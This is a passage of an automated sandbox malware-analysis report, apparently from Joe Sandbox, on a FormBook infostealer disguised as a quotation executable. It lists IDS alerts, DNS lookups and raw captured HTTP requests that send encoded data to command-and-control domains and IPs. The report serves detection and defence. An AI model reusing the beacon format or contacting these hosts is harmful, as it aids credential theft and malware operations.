              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49761 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 136.243.64.147:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49822 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 104.21.112.1:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49777 -> 136.243.64.147:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49794 -> 194.9.94.85:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49810 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49793 -> 104.21.112.1:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49806 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49814 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49798 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49818 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 104.21.13.141:80
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.furrcali.xyz
              Source: Joe Sandbox ViewIP Address: 103.106.67.112 103.106.67.112
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
              Source: Joe Sandbox ViewASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
              Source: Joe Sandbox ViewASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_006ACE44
              Source: global trafficHTTP traffic detected: GET /js1x/?LSbaT=zft4LoBw&lV=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /jwa9/?lV=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&LSbaT=zft4LoBw HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /3u0p/?lV=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=&LSbaT=zft4LoBw HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /qps0/?lV=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&LSbaT=zft4LoBw HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /nkmx/?lV=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&LSbaT=zft4LoBw HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /t3iv/?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /bwjl/?lV=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&LSbaT=zft4LoBw HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /kj1o/?lV=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs=&LSbaT=zft4LoBw HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&LSbaT=zft4LoBw HTTP/1.1Host: www.100millionjobs.africaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /wbfy/?lV=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&LSbaT=zft4LoBw HTTP/1.1Host: www.mirenzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /kgjj/?lV=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=&LSbaT=zft4LoBw HTTP/1.1Host: www.nextlevel.financeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&LSbaT=zft4LoBw HTTP/1.1Host: www.furrcali.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /w98i/?lV=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=&LSbaT=zft4LoBw HTTP/1.1Host: www.buyspeechst.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /js1x/?LSbaT=zft4LoBw&lV=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /jwa9/?lV=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&LSbaT=zft4LoBw HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /3u0p/?lV=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=&LSbaT=zft4LoBw HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /qps0/?lV=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&LSbaT=zft4LoBw HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /nkmx/?lV=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&LSbaT=zft4LoBw HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /t3iv/?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /bwjl/?lV=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&LSbaT=zft4LoBw HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficHTTP traffic detected: GET /kj1o/?lV=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs=&LSbaT=zft4LoBw HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
              Source: global trafficDNS traffic detected: DNS query: www.milp.store
              Source: global trafficDNS traffic detected: DNS query: www.chiro.live
              Source: global trafficDNS traffic detected: DNS query: www.mzkd6gp5.top
              Source: global trafficDNS traffic detected: DNS query: www.bokus.site
              Source: global trafficDNS traffic detected: DNS query: www.elettrocoltura.info
              Source: global trafficDNS traffic detected: DNS query: www.givvjn.info
              Source: global trafficDNS traffic detected: DNS query: www.bonheur.tech
              Source: global trafficDNS traffic detected: DNS query: www.rpa.asia
              Source: global trafficDNS traffic detected: DNS query: www.ogbos88.cyou
              Source: global trafficDNS traffic detected: DNS query: www.smartbath.shop
              Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
              Source: global trafficDNS traffic detected: DNS query: www.mirenzhibo.net
              Source: global trafficDNS traffic detected: DNS query: www.nextlevel.finance
              Source: global trafficDNS traffic detected: DNS query: www.furrcali.xyz
              Source: global trafficDNS traffic detected: DNS query: www.buyspeechst.shop
              Source: global trafficDNS traffic detected: DNS query: www.lejgnu.info
              Source: unknownHTTP traffic detected: POST /jwa9/ HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeCache-Control: no-cacheContent-Length: 199Content-Type: application/x-www-form-urlencodedOrigin: http://www.chiro.liveReferer: http://www.chiro.live/jwa9/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 6c 56 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d Data Ascii: lV=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:47:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oi9rZc1DajXu1cLSVCN7jLyQ0aRms2gZLp75UQAdmOBAl%2FnlViuBI%2FP6bavjHK%2FBc19EvmEP%2B8Jebj5TPgTCOybMbJhDkVvHqHCqAKCSNYm1segd3upbK2Cayc8M9%2Bio26BT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5919f6c076075-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118823&min_rtt=118823&rtt_var=59411&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXhyTWjNyFWLhCq5LJQ0mJ1gXWo415ILhjEOrR%2BMXrpKAw1%2FL7GYDUIKWJKg%2B7YEDrue1SLJyti%2Bd0cIvAcyyTyTD5EgOn3DpsiSUPX03ar1byJ4HZ27nn9LC587PAUEFgi7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff591affb8fa482-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=120227&min_rtt=120227&rtt_var=60113&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zELVCdTgKqAqAvxAEYSCyv85anV331n63HVrbhVhkxEHdyqn6GB7W2T4qdp%2B%2B2C1mSmGBfD7SjEhQ3dVNHOMr7Op3CJVMDgnT3Mmj1ta1A%2BeVxfSwNsq5LcGeWywdxWMNd7X"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff591c08a05a482-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=120105&min_rtt=120105&rtt_var=60052&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7964&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f 